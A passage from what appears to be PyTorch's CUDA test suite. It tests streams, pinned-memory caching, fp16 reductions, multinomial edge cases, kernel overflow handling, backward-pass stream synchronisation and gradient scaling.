cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would cause overflow to negative value
# giving negative bin offset
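# (35488 * 65536 = 2,325,741,568 > 2**31 - 1 = 2,147,483,647, so an int32 offset wraps negative.)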
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses whether proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_op_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# The assertEqual calls below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
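# In both paths, unscaling multiplies each grad in place by inv_scale (0.25 here, i.e. scale=4),
# so the 4.0-filled grads below should come back as ones, and found_inf should end up 1.0
# exactly when some grad contains an inf or nan.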
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to the single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
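# Roughly, _unscale_grads_ is expected to bucket the grads above by (device, dtype), e.g.
#     {cuda:0: {float32: [...], float16: [...]}, cuda:1: {float32: [...], float16: [...]}}
# and call _amp_foreach_non_finite_check_and_unscale_ once per bucket, so an inf planted in
# any single grad must still show up in the per-device found_inf results checked below.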
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
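# Expected behavior of _amp_update_scale_ with these settings: each non-inf step increments
# growth_tracker, and once growth_interval (2) consecutive non-inf steps are seen the scale is
# multiplied by growth (2.0) and the tracker resets; any inf step multiplies the scale by
# backoff (0.25) and resets the tracker. The assertions below trace 4.0 -> 4.0 -> 8.0 -> 2.0.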
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
